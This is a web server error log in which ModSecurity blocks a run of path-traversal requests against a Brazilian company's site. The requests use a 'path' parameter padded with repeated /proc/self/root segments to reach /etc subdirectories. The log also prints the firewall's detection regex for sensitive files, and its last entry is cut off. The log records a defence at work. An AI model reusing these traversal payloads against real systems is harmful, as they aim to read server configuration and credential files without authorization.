[Tue Mar 17 16:42:25.630148 2026] [:error] [pid 25836:tid 140411548894976] [client 74.7.243.128:51660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuoYh-PF_25v4hFRB7MwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:26.027769 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:43260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuotY0UrI5A3LftIwNXwAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:27.380638 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:59238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuo9Y0UrI5A3LftIwNYAAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:29.039333 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:59254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmupda6ubjKNq_cu4YYQgAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:32.115604 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:59256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuqMU6Sx0TG1YjmQi-gQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:37.314038 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:59270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmurcU6Sx0TG1YjmQi-hAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:40.044776 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:49392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmusNY0UrI5A3LftIwNZQAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:41.565383 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:49404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmusdY0UrI5A3LftIwNaQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:41.762813 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:49404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmusdY0UrI5A3LftIwNagAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:42.340195 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:49404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmustY0UrI5A3LftIwNawAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:44.385687 2026] [:error] [pid 18380:tid 140411624429312] [client 74.7.241.31:49418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmutK4xEDsg_V3ESNZbXAAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:45.133780 2026] [proxy_fcgi:error] [pid 7437:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52620] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:42:45.972942 2026] [:error] [pid 7004:tid 140411641214720] [client 74.7.241.31:49430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmutcU6Sx0TG1YjmQi-hgAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:47.342052 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.31:49998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmutweiSKl8TjouI-YnyQAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:52.896678 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:50010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuvNY0UrI5A3LftIwNbwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:54.668340 2026] [:error] [pid 18380:tid 140411691570944] [client 74.7.241.31:50014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuvq4xEDsg_V3ESNZbZgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:55.991251 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:50024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuv9a6ubjKNq_cu4YYUgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:57.389849 2026] [:error] [pid 25836:tid 140411683178240] [client 74.7.241.31:48718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuwYh-PF_25v4hFRB7OwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:58.842672 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:48726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuwoh-PF_25v4hFRB7PAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:00.866265 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:48740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuxNY0UrI5A3LftIwNdQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:02.347201 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:48750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuxta6ubjKNq_cu4YYWAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:04.632353 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:48766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuyNa6ubjKNq_cu4YYXAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:43:06.794218 2026] [:error] [pid 6296:tid 140411582465792] [client 74.7.241.31:48776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] 